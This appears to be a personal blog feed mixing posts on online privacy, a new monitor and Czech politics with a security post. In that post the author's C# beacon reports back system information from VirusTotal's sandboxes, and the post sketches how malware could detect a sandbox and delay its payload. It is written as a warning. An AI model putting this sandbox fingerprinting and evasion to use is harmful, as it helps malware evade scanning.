adawolfa

daily occasional dose of nihilism🌗

Password

This mother is demanding her kid’s Facebook password. The sub is full of weirdos, but I find this one unusually disturbing. Apart from a personal diary and your own mind, is there anything more private than anyone’s one-to-one conversation? Sure, you can discuss things in personal, or you can make a phone call, but it’s 2019, it’s pretty common to use a messenger, I guess. What you think and talk about with your closest friends is kinda who you are. This is a direct attack to your own identity and personality.

It’s an easy problem to solve, you can just create and use a different channel from the one being monitored (which is, by the way, exactly what is going to happen in this particular case). In other words, mutual trust is lost and worse, the claimed „protection“ is now off the table, as there is a channel the parent doesn’t even know about. I wouldn’t count on the woman actually explaining her child what’s an online safety and privacy and how (and why!) to keep it.

I mean, how is this different from listening to anyone else’s phone calls, reading their letters and stalking on them? How do you actually do this without considering yourself a piece of shit?

Who can use Facebook: … For this reason, you must: Not share your password, give access to your Facebook account to others, or transfer your account to anyone else (without our permission).

facebook.com/legal/terms

Theoretically, this could even be a federal crime. At the end of the day, password is a sort of a property and as such it should be protected, no exception.

Finally got a 144 Hz screen. It definitely worth it, but why can’t we have a 23″ FullHD? Being quite fullscreen (maximized window) person, I’m pretty fine with that resolution (dual screen). The smallest I could find for a reasonable price was 27″. I mean it’s acceptable, I don’t perceive individual pixels, but why?

Took me an hour to figure out why the hell is the screen running on 60 Hz in ET. I found out that’s because of my r_colorBits set to 34. No idea why would I set it like that! Anyway, it’s awesome how smooth the game is. And even after switching to 76 FPS in order to reduce sniper recoil, the game is still playable (it’s still better than 125 FPS on a 60 Hz screen), no more jerky and broken frames. Also scrolling in browser is much more smooth.

The only obvious downside here is that I will no longer be able to use a 60 Hz screen.

Dnes si, milé děti, povíme pohádku o loupežníkovi Kolovratníkovi z Babišova velkostatku, který chudým bral a bohatým dával.

„V minulosti již zavedené opatření v podobě emisních poplatků na nejstarší vozy vedlo k radikálnímu snížení jejich dovozu. Kupující jednoduše začali preferovat koupi novějších a čistších vozů. Stát může v této politice jednoduše pokračovat“.

A ve které realitě žijete vy?

VirusTotal sample execution

So today I read an interesting article about how a binary was automatically submitted to Microsoft Defender online service for further analysis. It turns out that unknown binaries are, sometimes, uploaded and executed in a testing environment on a computer with Internet access.

I made a simple C# application which simply dumps all environment variables, running processes and captures ipconfig output. This dump is then sent to my endpoint and it’s stored in database. For some reason, I wasn’t able to trigger Microsoft Defender automatic sample submission, so I tried something different - I’ve submitted the binary to virustotal.com.

I’ve immediately got green - no malware found. Interestingly, nothing was submitted to my API at that point. But, few minutes later, application was executed somewhere!

Two responses came from the same address and, assuming from internal IP, also same computer.

IP: 66.102.8.227

Path: C:\Program Files (x86)\Windows Resource Kits\Tools\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\python27;C:\Users\John\AppData\Local\Microsoft\WindowsApps;;c:\python27\lib\site-packages\pywin32_system32
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: WIN-VUA6POUV5UP
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\John\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\John\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
TIX_LIBRARY: C:\Python27\tcl\tix8.4.3
TCL_LIBRARY: C:\Python27\tcl\tcl8.5
TMP: C:\Users\John\AppData\Local\Temp
TK_LIBRARY: C:\Python27\tcl\tk8.5
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
HOMEPATH: \Users\John
COMPUTERNAME: WIN-VUA6POUV5UP
USERPROFILE: C:\Users\John
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: John
NUMBER_OF_PROCESSORS: 1
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 45 Stepping 7, GenuineIntel
PYTHONPATH: c:\tools
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\WIN-VUA6POUV5UP
TEMP: C:\Users\John\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
USERDOMAIN_ROAMINGPROFILE: WIN-VUA6POUV5UP
PROCESSOR_REVISION: 2d07
SystemRoot: C:\Windows
PROMPT: $P$G
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


c:\Users\John\Downloads\download.exe

Path: C:\Program Files (x86)\Windows Resource Kits\Tools\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;c:\python27;C:\Users\John\AppData\Local\Microsoft\WindowsApps;;c:\python27\lib\site-packages\pywin32_system32
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: WIN-VUA6POUV5UP
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\John\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\John\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
TIX_LIBRARY: C:\Python27\tcl\tix8.4.3
TCL_LIBRARY: C:\Python27\tcl\tcl8.5
TMP: C:\Users\John\AppData\Local\Temp
TK_LIBRARY: C:\Python27\tcl\tk8.5
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
HOMEPATH: \Users\John
COMPUTERNAME: WIN-VUA6POUV5UP
USERPROFILE: C:\Users\John
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: John
NUMBER_OF_PROCESSORS: 1
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 45 Stepping 7, GenuineIntel
PYTHONPATH: c:\tools
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\WIN-VUA6POUV5UP
TEMP: C:\Users\John\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
USERDOMAIN_ROAMINGPROFILE: WIN-VUA6POUV5UP
PROCESSOR_REVISION: 2d07
SystemRoot: C:\Windows
PROMPT: $P$G
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


c:\Users\John\Downloads\download.exe

svchost
svchost
svchost
svchost
splwow64
SearchUI
winlogon
conhost
svchost
dwm
svchost
sihost
svchost
c:\python27\python.exe
conhost
C:\Program Files\Meterpreter\metsvc.exe
c:\Users\John\Downloads\download.exe
lsass
smss
services
conhost
csrss
wininit
msdtc
C:\Windows\SysWoW64\cmd.exe
OSPPSVC
svchost
svchost
C:\Program Files\Meterpreter\metsvc-server.exe
svchost
csrss
WMIADAP
svchost
RuntimeBroker
svchost
explorer
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
ShellExperienceHost
WmiPrvSE
svchost
svchost
svchost
System
spoolsv
Idle


Windows IP Configuration


Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::b587:5273:1adc:5eb3%5
   IPv4 Address. . . . . . . . . . . : 10.0.2.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.2.2

This came from a different address and it was executed with administrator privileges.

IP: 54.39.189.18

Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\admin\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\admin\AppData\Local\Programs\Python\Python37\
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: USER-PC
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\admin\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\admin\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
windows_tracing_flags: 3
windows_tracing_logfile: C:\BVTBin\Tests\installpackage\csilogfile.log
TMP: C:\Users\admin\AppData\Local\Temp
USERPROFILE: C:\Users\admin
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
FP_NO_HOST_CHECK: NO
HOMEPATH: \Users\admin
COMPUTERNAME: USER-PC
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: admin
NUMBER_OF_PROCESSORS: 2
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 60 Stepping 1, GenuineIntel
SystemRoot: C:\Windows
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\USER-PC
TEMP: C:\Users\admin\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
PROCESSOR_REVISION: 3c01
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


C:\Users\admin\Downloads\DTR.Test.exe

Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\dotnet\;C:\Program Files (x86)\dotnet\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\admin\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\admin\AppData\Local\Programs\Python\Python37\
SESSIONNAME: Console
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
USERDOMAIN: USER-PC
PROCESSOR_ARCHITECTURE: x86
ProgramW6432: C:\Program Files
PUBLIC: C:\Users\Public
APPDATA: C:\Users\admin\AppData\Roaming
windir: C:\Windows
LOCALAPPDATA: C:\Users\admin\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
windows_tracing_flags: 3
windows_tracing_logfile: C:\BVTBin\Tests\installpackage\csilogfile.log
TMP: C:\Users\admin\AppData\Local\Temp
USERPROFILE: C:\Users\admin
ProgramFiles: C:\Program Files (x86)
PROCESSOR_LEVEL: 6
FP_NO_HOST_CHECK: NO
HOMEPATH: \Users\admin
COMPUTERNAME: USER-PC
PROCESSOR_ARCHITEW6432: AMD64
USERNAME: admin
NUMBER_OF_PROCESSORS: 2
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 60 Stepping 1, GenuineIntel
SystemRoot: C:\Windows
ComSpec: C:\Windows\system32\cmd.exe
LOGONSERVER: \\USER-PC
TEMP: C:\Users\admin\AppData\Local\Temp
ProgramFiles(x86): C:\Program Files (x86)
CommonProgramFiles: C:\Program Files (x86)\Common Files
PROCESSOR_REVISION: 3c01
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ALLUSERSPROFILE: C:\ProgramData
SystemDrive: C:
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
OS: Windows_NT
ProgramData: C:\ProgramData
HOMEDRIVE: C:


C:\Users\admin\Downloads\DTR.Test.exe

dwm
winlogon
taskhost
taskhost
smss
csrss
conhost
svchost
SearchFilterHost
svchost
wmpnetwk
frida-winjector-helper-64
spoolsv
pythonw
lsm
svchost
svchost
svchost
explorer
lsass
C:\Users\admin\AppData\Local\Temp\frida-cce960e005f9cecbea94cf1ed62cd59b\frida-winjector-helper-32.exe
C:\Users\admin\AppData\Local\Temp\frida-cce960e005f9cecbea94cf1ed62cd59b\frida-winjector-helper-32.exe
csrss
conhost
svchost
svchost
services
sppsvc
audiodg
svchost
svchost
wininit
C:\Users\admin\Downloads\DTR.Test.exe
rundll32
svchost
SearchProtocolHost
WmiPrvSE
svchost
C:\Windows\pyw.exe
SearchIndexer
System
WmiPrvSE
WmiPrvSE
Idle


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : openstacklocal
   Link-local IPv6 Address . . . . . : fe80::4143:fe31:8593:6d6e%11
   IPv4 Address. . . . . . . . . . . : 10.0.2.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.2.2

Tunnel adapter isatap.openstacklocal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : openstacklocal

It’s not something surprising or particularly interesting, really. Just a recyclable short-lived container.

However, VirusTotal executes your program after saying it’s clean to a user. And even if it doesn’t, well - you could detect environment, do the application interactive (like waiting for a mouse move, or something which only happens on a real computer) and conditionally download and execute an actual malicious code.

Sure, VirusTotal has its uses - but can we say, in general, that a green marked application is safe to run? No, we cannot. The only thing you can assume is that the binary itself doesn’t contain malicious code, or it’s not well known, at least.

Just don’t blindly trust VirusTotal and think twice about what it actually does.

Každému doporučuji využít jedinečné možnosti nahlédnout do duše zakazovače, který se s námi podělil o neotřelé téma Auto je zbraň. Padají nejrůznější nápady, jak se vypořádat s hromadami mrtvol kolem silnic - jenom letos při dopravní nehodě zemřelo nejméně 380 lidí! Pana Skalického zjevně vzrušují kurzy bezpečné jízdy, líbilo by se mu také, kdyby na automobil s výkonnějším motorem bylo zapotřebí absolovování zkoušky a milostivého svolení úředníka. Jízdu v silnějším autě by si pak měl každý zasloužit.